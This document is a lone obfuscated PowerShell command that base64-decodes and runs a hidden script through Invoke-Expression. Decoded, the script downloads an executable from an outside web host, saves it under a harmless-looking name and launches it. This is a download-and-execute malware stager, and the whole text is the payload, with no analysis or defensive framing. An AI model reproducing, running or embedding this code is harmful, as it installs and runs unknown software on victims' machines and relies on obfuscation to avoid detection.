iex([syStEm.tExt.encODINg]::uTf8.GeTstrINg([sYsTEm.CONverT]::fROMbase64STRIng('CihOZXctT2JqZWN0IHNZc3RlTS5ORVQuV2VCY2xpRU5UKS5ET1dOTG9BRGZJbGUoJ2h0dHA6Ly93b3JsZG5pdC5jb20vY29tcHUuZXhlJywnZmxlZWJsZS5leGUnKTtTdGFydC1Qcm9jZXNzICdmbGVlYmxlLmV4ZScKCg==')));exit

